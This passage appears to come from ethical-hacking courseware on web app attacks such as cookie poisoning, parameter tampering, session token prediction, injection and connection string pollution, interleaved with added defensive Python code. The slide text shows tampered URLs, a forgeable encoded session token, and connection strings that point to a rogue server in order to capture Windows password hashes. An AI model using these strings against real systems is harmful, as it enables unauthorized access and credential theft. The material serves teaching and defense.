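(RememberUser=ABY112010) beside a CSPRNG-based one, and two checks a
developer or assessor can run on a sample of issued IDs. Added example, not
courseware code; the generator and function names are hypothetical."""
import itertools
import math
import re
import secrets
from collections import Counter

_counter = itertools.count(112010)


def weak_session_id(username):
    """Predictable: user initials plus an incrementing counter."""
    return username[:3].upper() + str(next(_counter))


def strong_session_id():
    """128 bits from the OS CSPRNG, base64url-encoded (22 characters)."""
    return secrets.token_urlsafe(16)


def session_cookie(session_id):
    """Set-Cookie value with the attributes a session cookie should carry."""
    return f"sid={session_id}; Path=/; Secure; HttpOnly; SameSite=Strict"


def sequential_fraction(ids):
    """Share of consecutive IDs whose trailing number increases by exactly 1;
    close to 1.0 means the generator is a counter."""
    nums = []
    for s in ids:
        m = re.search(r"(\d+)$", s)
        nums.append(int(m.group(1)) if m else None)
    pairs = list(zip(nums, nums[1:]))
    hits = sum(1 for a, b in pairs if a is not None and b is not None and b - a == 1)
    return hits / len(pairs) if pairs else 0.0


def entropy_bits(ids):
    """Sum over character positions of the empirical Shannon entropy, in bits.
    A rough lower bound on the guessing work implied by this sample."""
    width = min(len(s) for s in ids)
    total = 0.0
    for pos in range(width):
        counts = Counter(s[pos] for s in ids)
        n = sum(counts.values())
        total -= sum(c / n * math.log2(c / n) for c in counts.values())
    return total


if __name__ == "__main__":
    weak = [weak_session_id("jason") for _ in range(200)]
    strong = [strong_session_id() for _ in range(200)]
    print("weak:  ", weak[0], sequential_fraction(weak), round(entropy_bits(weak), 1))
    print("strong:", strong[0], sequential_fraction(strong), round(entropy_bits(strong), 1))
```

Collect a few hundred IDs from your own application, the way the first step above describes for an attacker, and run both checks: a sequential fraction near 1.0 or a summed entropy far below what the token length could carry means the IDs can be predicted or brute forced. The fix is the CSPRNG generator together with the Secure, HttpOnly and SameSite attributes shown in session_cookie, not a hash of a predictable value, which keeps the same small search space.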


Cookie Exploitation: Cookie Poisoning

- If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping
- Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication
- Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.

[Figure: OWASP ZAP (Untitled Session) showing an intercepted request in the Request tab with its User-Agent, Cache-Control, Accept, Referer, Accept-Encoding, Accept-Language, Accept-Charset, Cookie, and Host headers, and the History, Search, Alerts, and Spider tabs below]

Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user.

Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered
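The Base64-only cookie the text calls a false sense of security, beside an HMAC-signed cookie that lets the server reject an altered copy. This is an added example, not courseware code; the key, the cookie fields and the function names are constructed for illustration.

```python
"""Cookie integrity: a Base64-only cookie (reversible and alterable) beside an
HMAC-signed cookie whose alteration the server detects. Added example, not
courseware code; the key, payload fields and function names are constructed."""
import base64
import hashlib
import hmac
import json
import secrets

SECRET_KEY = secrets.token_bytes(32)    # kept on the server, never sent to clients


def encode_cookie(data):
    """What the text describes: Base64 is an encoding, not protection. Anyone
    holding the cookie can decode it, edit a field and re-encode it."""
    return base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()


def decode_cookie(value):
    """The server side of the encoded-only scheme: it cannot tell an edited
    cookie from a genuine one."""
    return json.loads(base64.urlsafe_b64decode(value))


def sign_cookie(data, key=SECRET_KEY):
    """payload.tag where tag = HMAC-SHA256(key, payload)."""
    payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode())
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return (payload + b"." + base64.urlsafe_b64encode(tag)).decode()


def verify_cookie(value, key=SECRET_KEY):
    """Return the cookie's data if the tag is valid, otherwise None so that
    the caller treats the request as unauthenticated."""
    try:
        payload, tag = value.encode().split(b".", 1)
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(base64.urlsafe_b64decode(tag), expected):
            return None
        return json.loads(base64.urlsafe_b64decode(payload))
    except ValueError:      # malformed base64 or JSON, or no separator
        return None


if __name__ == "__main__":
    plain = encode_cookie({"user": "jason", "role": "user"})
    edited = encode_cookie({**decode_cookie(plain), "role": "admin"})
    print("encoded-only cookie after edit decodes to:", decode_cookie(edited))
    signed = sign_cookie({"user": "jason", "role": "user"})
    edited_signed = encode_cookie({"user": "jason", "role": "admin"}) + "." + signed.split(".", 1)[1]
    print("signed cookie after edit verifies to:", verify_cookie(edited_signed))
```

Signing makes tampering detectable; it does not make the contents private, so passwords and other secrets still do not belong in the cookie at all. The better design keeps only a random session identifier on the client and the user's role and data on the server, and signs whatever client-side state cannot be avoided.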


[Methodology steps: Attack Web Servers | Attack Authentication Mechanism | Attack Session Management Mechanism | Attack Data Connectivity | Attack Web Services]

Web App Hacking Methodology

Authorization protects web applications by giving authority to certain users for accessing the applications and restricting certain users from accessing such applications. Attackers, by means of authorization attacks, try to gain access to the information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.


Authorization Attack

- Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, username, access group, cost, file names, file identifiers, etc.
- Attackers first access the web application using a low privileged account and then escalate privileges to access protected resources

[Figure: sources of authorization attacks; the labels Query String and Hidden Tags are legible]

Authorization Attack

In an authorization attack, the attacker first finds the lowest privileged account, then logs in as an authentic user and slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, username, access group, cost, file names, file identifiers, etc.

The sources that are used by the attackers in order to perform authorization attacks include uniform resource identifier, parameter tampering, POST data, HTTP headers, query string, cookies, and hidden tags.

Parameter Tampering

Parameter tampering is an attack that is based on the manipulation of parameters that are exchanged between server and client in order to modify the application data, such as price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and is used to increase control and application functionality.

lE P P o s tD a ta
P ost d a ta o fte n is c o m p ris e d o f a u th o r iz a tio n a n d se ssio n in fo r m a tio n , sin c e in m o s t
o f th e a p p lic a tio n s , th e in fo r m a tio n t h a t is p ro v id e d b y th e c lie n t m u s t be a s s o c ia te d


HTTP Request Tampering

Query String Tampering

• If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms

http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com

https://juggyshop.com/books/download/852741369.pdf

https://juggybank.com/login/home.jsp?admin=true

• Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters

HTTP Headers

• If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities

GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False

ItemID=201 is not accessible as the Admin parameter is set to False; the attacker can change it to True and access protected items

HTTP Request Tampering

Attackers tamper with the HTTP request without using another user's ID. The attacker changes the request in transit, before the message is received by the intended receiver.

Query String Tampering

An attacker tampers with the query string when web applications use query strings to pass messages between pages. If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms.

FIGURE 13.46: Query String Tampering

Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

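The query-string and Referer examples on this slide fail for the same reason: the server lets data supplied in the request decide authorization. The following Python is an added example written for this page, not code from the course. It models a download endpoint with constructed item and session data (the item number 201 and the Admin=True Referer mirror the slide; the owners, roles and session identifiers are hypothetical) and contrasts a handler that trusts the request with one that derives the principal from server-side session state and checks the object against it.

```python
"""Authorization for a download endpoint: request-supplied data versus
server-side state (added example; all sample data is constructed)."""
from dataclasses import dataclass, field

# Constructed catalogue: which items exist, who owns them, which are admin-only.
ITEMS = {
    201: {"owner": "alice", "admin_only": True},
    202: {"owner": "bob", "admin_only": False},
}

# Constructed server-side session store, keyed by the session cookie value.
SESSIONS = {
    "sess-alice": {"user": "alice", "role": "user"},
    "sess-bob": {"user": "bob", "role": "user"},
    "sess-root": {"user": "root", "role": "admin"},
}


@dataclass
class Request:
    session_id: str
    item_id: int
    query: dict = field(default_factory=dict)    # parsed query string
    headers: dict = field(default_factory=dict)  # HTTP request headers


def download_vulnerable(req: Request) -> int:
    """Decides access from the 'admin' query parameter and the Referer header.
    Both are written by the client, so both can be rewritten in a proxy."""
    claims_admin = req.query.get("admin", "false").lower() == "true"
    came_from_admin_page = "Admin=True" in req.headers.get("Referer", "")
    item = ITEMS.get(req.item_id)
    if item is None:
        return 404
    if item["admin_only"] and not (claims_admin or came_from_admin_page):
        return 403
    return 200


def download_hardened(req: Request) -> int:
    """Identifies the caller from the server-side session and checks the item's
    access rule against that principal. Query parameters and headers play no
    part in the decision; the client cannot change what the server stores."""
    session = SESSIONS.get(req.session_id)
    if session is None:
        return 401                       # no valid session: not authenticated
    item = ITEMS.get(req.item_id)
    if item is None:
        return 404
    if session["role"] == "admin":
        return 200                       # admins may read everything
    if item["admin_only"] or item["owner"] != session["user"]:
        return 403                       # object-level check against the principal
    return 200
```

The hardened handler also closes the file-identifier case from the previous slide (changing 852741369.pdf to another number): every item is checked for ownership, so guessing an identifier yields 403 rather than another user's file.
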
HTTP Headers

If the application uses the Referer header for making access control decisions,


• In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism

• The attacker then traps cookies set by the web application, tampers with their parameters using tools such as OWASP Zed Attack Proxy, and replays them to the application

https://www.owasp.org

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web application in order to perform malicious attacks.

• In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism.

• The attacker then traps cookies set by the web application, tampers with their parameters using tools such as Paros Proxy, and replays them to the application.

Source: https://www.owasp.org

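Tampering with cookie parameters succeeds when the server cannot tell an altered cookie from one it issued. A standard defence is to bind each cookie value to a keyed MAC so that any change is detected on the next request. The following Python is an added example, not course material; the server key and the user=jason;role=user payload are constructed for the illustration.

```python
"""Keyed integrity protection for cookie values (added example)."""
import base64
import hashlib
import hmac

# Constructed server-side secret; a real deployment loads this from a secret store.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def _mac(payload: str, key: bytes) -> str:
    """Base64url-encoded HMAC-SHA256 of the payload (no padding; never contains '.')."""
    digest = hmac.new(key, payload.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def sign_cookie(payload: str, key: bytes = SERVER_KEY) -> str:
    """Return '<payload>.<mac>'. The payload stays readable (this is integrity,
    not confidentiality), but it cannot be changed without the key."""
    return payload + "." + _mac(payload, key)


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the payload if the MAC verifies, otherwise None. Splitting on the
    last '.' is safe because the base64url alphabet contains no '.'."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    # compare_digest runs in constant time, so the check leaks no timing information
    if not hmac.compare_digest(tag, _mac(payload, key)):
        return None
    return payload


def role_from_cookie(cookie: str, key: bytes = SERVER_KEY) -> str:
    """What a request handler does: reject on failed verification, otherwise
    read the role field from the verified payload."""
    payload = verify_cookie(cookie, key)
    if payload is None:
        return "rejected"
    fields = dict(part.split("=", 1) for part in payload.split(";") if "=" in part)
    return fields.get("role", "rejected")
```

Signing stops tampering; it does not hide the payload and does not stop replay of a captured cookie. The stronger design keeps user and role in a server-side session store and puts only an opaque identifier in the cookie, so there is nothing in the cookie worth rewriting.
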

[Figure: Web App Hacking Methodology: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]

Web App Hacking Methodology

Attack Session Management Mechanism

The session management mechanism is the key security component in most web applications. Because it plays such a central role, it has become a prime target for malicious attacks against application session management. An attacker who breaks the application's session management can easily bypass robust authentication controls and masquerade as another application user without knowing that user's credentials (username, password). The attacker can even take the entire application under his or her control by compromising an administrative user in this way. The attacks on the session management mechanism are described in detail on the following slides.


Session Management Attack

A session management attack is one of the methods used by attackers to compromise a network. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate a privileged application user. A session management attack involves two stages: one is session token generation and the other is exploiting session token handling.

In order to generate a valid session token, the attacker performs:

• Session Token Prediction

• Session Token Tampering

Once the attacker generates a valid session token, the attacker tries to exploit the session token handling in the following ways:

• Session Hijacking

• Session Replay

• Man-in-the-Middle Attack


Attacking Session Token Generation Mechanism

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When the session token is the hex-encoding of the ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token by just changing the date and use it for another transaction with the server

Session Token Prediction

• Attackers obtain valid session tokens by sniffing the traffic or legitimately logging in to the application and analyzing it for encoding (hex-encoding, Base64) or any pattern

• If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users

• Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session token

Attacking Session Token Generation Mechanism

Attackers steal valid session tokens and, after obtaining them, predict the next session token.

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When the session token is the hex-encoding of the ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token by just changing the date and using it for another transaction with the server.

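A defender can apply the same analysis the slide describes to their own application's tokens before anyone else does. The Python below is an added example, not course code: it percent-decodes the slide's token, shows that it is nothing more than encoded application state, and contrasts it with an opaque token drawn from the operating system's CSPRNG. The structure test in looks_like_encoded_state is a heuristic chosen for this example; the token value is the one on the slide.

```python
"""Auditing session tokens for recoverable structure (added example)."""
import re
import secrets
from urllib.parse import unquote

# The token from the slide's weak-encoding example (query-string value only).
SLIDE_TOKEN = (
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30"
)

# key=value pairs separated by ';' (optional trailing ';')
_KV_PATTERN = re.compile(
    r"[A-Za-z_][A-Za-z0-9_]*=[^;]*(?:;[A-Za-z_][A-Za-z0-9_]*=[^;]*)*;?"
)


def decode_token(token: str) -> str:
    """Undo percent/hex encoding; returns the token unchanged if it has none."""
    return unquote(token)


def parse_fields(decoded: str) -> dict:
    """Split 'k=v;k=v' into a dict. A token without '=' yields {}."""
    fields = {}
    for part in decoded.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def looks_like_encoded_state(token: str) -> bool:
    """Heuristic: a token that decodes to printable key=value pairs carries
    application state (user, role, date) that anyone can rewrite; it is not a
    random identifier."""
    decoded = decode_token(token)
    return decoded.isprintable() and _KV_PATTERN.fullmatch(decoded) is not None


def generate_session_token(nbytes: int = 32) -> str:
    """Opaque identifier with nbytes of CSPRNG entropy (256 bits by default).
    The server maps it to session state that it keeps itself."""
    return secrets.token_urlsafe(nbytes)


def audit(token: str) -> str:
    """Return 'weak' with the recovered fields, or 'opaque'."""
    if looks_like_encoded_state(token):
        return "weak: decodes to " + repr(parse_fields(decode_token(token)))
    return "opaque"
```

The check above catches the encoding case on the slide; it does not catch a token that is random-looking but generated from a predictable seed, which is why the prediction step that follows (collecting many tokens and looking for patterns) is still worth running against one's own application.
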
Session Token Prediction

Attackers obtain valid session tokens by sniffing the traffic or legitimately logging in to the application and analyzing it for encoding (hex-encoding, Base64) or any pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the

Attacking Session Tokens Handling Mechanism: Session Token Sniffing

• Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, attackers can replay the cookie to gain unauthorized access to the application

• Attackers can use session cookies to perform session hijacking, session replay, and Man-in-the-Middle attacks

Attacking Session Tokens Handling Mechanism: Session Token Sniffing

Attackers first sniff the network traffic for valid session tokens and then predict the next session token based on the sniffed session token. The attacker uses the predicted session ID to authenticate him or herself with the target web application. Thus, sniffing a valid session token is an important step in session management attacks. Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, attackers can replay the cookie to gain unauthorized access to the application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.

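The Secure flag condition in the paragraph above is something a defender can check mechanically in every response. The following Python is an added example, not course material: it parses Set-Cookie header values and reports session cookies that lack the Secure, HttpOnly or SameSite attributes. The list of session cookie names and the sample header block are constructed for the example.

```python
"""Auditing Set-Cookie headers for transport and script-access protections
(added example)."""

# Cookie names commonly used for session tokens (constructed list for the example).
SESSION_COOKIE_NAMES = {
    "sessiontoken", "sessionid", "jsessionid", "phpsessid", "asp.net_sessionid",
}


def parse_set_cookie(header_value: str) -> dict:
    """Parse one Set-Cookie value into name, value and a lower-cased attribute map.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header_value: str) -> list:
    """Return the list of missing protections for a session cookie (empty if
    none are missing, or if the cookie is not a session cookie)."""
    cookie = parse_set_cookie(header_value)
    if cookie["name"].lower() not in SESSION_COOKIE_NAMES:
        return []
    attrs = cookie["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: the token is also sent over plain HTTP and can be sniffed")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: script running on the page can read the token")
    if attrs.get("samesite", "").lower() not in {"lax", "strict"}:
        findings.append("missing SameSite=Lax/Strict: the token rides along on cross-site requests")
    return findings


def audit_response_headers(raw_headers: str) -> dict:
    """Audit every Set-Cookie line in a raw header block; returns {cookie name: findings}."""
    report = {}
    for line in raw_headers.splitlines():
        header, sep, value = line.partition(":")
        if sep and header.strip().lower() == "set-cookie":
            findings = audit_set_cookie(value.strip())
            if findings:
                report[parse_set_cookie(value.strip())["name"]] = findings
    return report


# Constructed response header block for the example.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Set-Cookie: SessionToken=7f3a9c; Path=/
Set-Cookie: theme=dark; Path=/
Set-Cookie: JSESSIONID=0A1B2C; Path=/; Secure; HttpOnly; SameSite=Lax
"""
```

Run against SAMPLE_HEADERS, the audit flags SessionToken on all three counts and passes JSESSIONID. The Secure attribute is the one that directly defeats the sniffing described above; HttpOnly and SameSite address the other two ways the same cookie is commonly stolen or misused.
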
Wireshark

Source: http://www.wireshark.org

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.


Web App Hacking Methodology

[Figure: Web App Hacking Methodology: Footprint Web Infrastructure, Attack Web Servers, Analyze Web Applications, Attack Authentication Mechanism, Attack Authorization Schemes, Attack Session Management Mechanism, Perform Injection Attacks, Attack Data Connectivity, Attack Web App Client, Attack Web Services]

Web App Hacking Methodology

Injection attacks are very common in web applications. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, SQL injection, LDAP injection, and XPath injection. Among all of these, the most frequently occurring is the SQL injection attack. Injection takes place when data supplied by the user is sent to an interpreter as part of a command or query. To launch an injection attack, the attacker supplies crafted data that tricks the interpreter into executing unintended commands or queries. Because of injection flaws, the attacker can easily read, create, update, and remove any arbitrary data available to the application. In some cases, the attacker can even bypass a deeply nested firewall environment and take complete control over the application and the underlying system. The details of each injection attack are given on the following slides.



Injection Attacks

• In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used in order to break the application's normal intended input

Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server

SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database

OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command

LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases

SMTP Injection: Inject arbitrary SMTP commands into the application and SMTP server conversation to generate large volumes of spam email

XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic

Note: For complete coverage of SQL Injection concepts and techniques refer to Module 14: SQL Injection

Injection Attacks

In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used in order to break the application's normally intended input.

• Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server

• OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command

• SMTP Injection: Inject arbitrary SMTP commands into the application and SMTP server conversation to generate large volumes of spam email

• SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database

• LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases

• XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic

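Two of the interpreters in the list above, the operating system shell and an LDAP directory, are most easily protected at the point where user input meets the command or filter. The following Python is an added example, not course code: it shows a command line built by concatenation next to an argv list built after allow-list validation, and an LDAP search filter built by concatenation next to one built with RFC 4515 escaping. The hostname pattern and the filter template are choices made for this example, and nothing in it executes a command or contacts a directory.

```python
"""Input handling for OS command and LDAP filter construction (added example)."""
import re

# --- OS command injection -------------------------------------------------
# Allow-list for a DNS hostname: labels of letters, digits and hyphens joined by dots.
_HOSTNAME = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
_SHELL_METACHARS = set(";|&$`<>()\n")


def is_valid_hostname(host: str) -> bool:
    """True only for input that matches the allow-list pattern."""
    return _HOSTNAME.match(host) is not None


def ping_command_unsafe(host: str) -> str:
    """What a vulnerable application does: builds a shell command line by
    concatenation. The string is only inspected here, never executed."""
    return "ping -c 1 " + host


def contains_shell_metachars(cmdline: str) -> bool:
    """True if a shell would treat part of cmdline as structure (another command,
    a pipe, a redirection) rather than as the hostname argument."""
    return any(ch in _SHELL_METACHARS for ch in cmdline)


def ping_argv_safe(host: str) -> list:
    """Validates the input and returns an argv list. Passing a list to
    subprocess.run() without shell=True means no shell ever parses the value,
    so metacharacters have no meaning even if validation were loosened."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]


# --- LDAP injection --------------------------------------------------------
# RFC 4515: these characters must be escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def person_filter_unsafe(name: str) -> str:
    """Concatenation: the value can rewrite the filter's structure."""
    return "(&(objectClass=person)(cn=" + name + "))"


def person_filter_safe(name: str) -> str:
    """Escaping: the value is always matched literally as a cn."""
    return "(&(objectClass=person)(cn=" + ldap_escape_value(name) + "))"
```

The two halves use the same shape of fix: decide what the input is allowed to be, and hand it to the interpreter in a form where it can only be data. Parameterised queries do the same job for SQL and are covered in Module 14.
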

[Figure: Web App Hacking Methodology: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services]

Web App Hacking Methodology

Attacking the data connectivity allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks, along with their causes and consequences, are explained in detail on the following slides.


Attack Data Connectivity

Database connection strings are used to connect applications to database engines

Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

Example of a common connection string used to connect to a Microsoft SQL Server database

Data Connectivity Attacks

• Connection String Injection

• Connection String Parameter Pollution (CSPP) Attacks

• Connection Pool DoS

Attack Data Connectivity

Attackers directly attack data connectivity so that they can access sensitive information available in the database. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.

Data Connectivity Attacks

• Connection String Injection

• Connection String Parameter Pollution (CSPP) Attacks

• Connection Pool DoS

Database connection strings are used to connect applications to database engines:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

This is an example of a common connection string used to connect to a Microsoft SQL Server database.


Connection String Injection

• In a delegated authentication environment, the attacker injects parameters in a connection string by appending them with the semicolon (;) character

• A connection string injection attack can occur when dynamic string concatenation is used to build connection strings based on user input

Before Injection

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

After Injection

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

When the connection string is populated, the Encryption value will be added to the previously configured set of parameters

Connection String Injection

A connection string injection attack can occur when dynamic string concatenation is used to build connection strings that are based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed using a "last one wins" algorithm, so the hostile input is substituted for a legitimate value.

The connection string builder classes are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs, and an invalid pair throws an exception. In addition, injected values are handled in a safe manner.

Before injection

The common connection string used to connect to the Microsoft SQL Server database is shown as follows:


Connection String Parameter Pollution (CSPP) Attacks

Attacker tries to connect to the database by using the Web Application System account instead of a user-provided set of credentials

[Table: example connection strings after parameter pollution]

Data source=SQL2005; initial catalog=db1; integrated security=no; user id=;Data Source=Rogue_Server; Password=; Integrated Security=true;

Data source=SQL2005; initial catalog=db1; integrated security=no; user id=;Data Source=Target_Server, Target_Port=443; Password=; Integrated Security=true;

Data source=SQL2005; initial catalog=db1; integrated security=no; user id=;Data Source=Target_Server, Target_Port; Password=; Integrated Security=true;

Attacker will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it's running on

Connection String Parameter Pollution (CSPP) Attacks

Connection string parameter pollution (CSPP) is used by attackers to steal user IDs and to hijack web credentials. CSPP specifically exploits the semicolon-delimited database connection strings that are constructed dynamically based on user input from web applications. In CSPP attacks, attackers overwrite parameter values in the connection string.

Hash Stealing

An attacker replaces the value of the data source parameter with that of a rogue Microsoft SQL Server connected to the Internet running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user id=;Data Source=Rogue_Server; Password=; Integrated Security=true;

Attackers will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it's running on.

Port Scanning

The attacker tries to connect to different ports by changing the value and observing the error messages obtained.

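Both the injection on the previous slide (an appended Encryption=off) and the CSPP overwrite above (a second Data Source that replaces the first) depend on two parser behaviours: the semicolon separates key/value pairs, and a repeated key is resolved last-one-wins. The following Python is an added example, not course code. It implements a parser with those two behaviours, with quoting rules modelled on the ADO.NET SQL Server provider and simplified (a value holding both quote characters is rejected rather than doubled), and shows a concatenated connection string next to one assembled by a builder that quotes values. The server names and credentials are constructed.

```python
"""Connection-string parsing (last-one-wins) and safe building (added example)."""


def parse_connection_string(conn: str) -> dict:
    """Parse 'key=value; key=value' into a dict with lower-cased keys.
    A value may be wrapped in single or double quotes when it contains ';'.
    A key that appears twice keeps the LAST value, as the providers do."""
    result = {}
    i, n = 0, len(conn)
    while i < n:
        while i < n and conn[i] in " ;":        # skip separators and spaces
            i += 1
        if i >= n:
            break
        eq = conn.find("=", i)
        if eq == -1:
            raise ValueError("malformed connection string")
        key = conn[i:eq].strip().lower()
        i = eq + 1
        while i < n and conn[i] == " ":
            i += 1
        if i < n and conn[i] in "'\"":          # quoted value: read to matching quote
            quote = conn[i]
            end = conn.find(quote, i + 1)
            if end == -1:
                raise ValueError("unterminated quoted value")
            value, i = conn[i + 1:end], end + 1
        else:                                   # bare value: read to next ';'
            end = conn.find(";", i)
            if end == -1:
                end = n
            value, i = conn[i:end].strip(), end
        result[key] = value                     # last one wins
    return result


def build_unsafe(server: str, database: str, user: str, password: str) -> str:
    """Dynamic concatenation: user-controlled values become part of the syntax."""
    return (f"Data Source={server}; Initial Catalog={database}; "
            f"User ID={user}; Password={password};")


def _quote_value(value: str) -> str:
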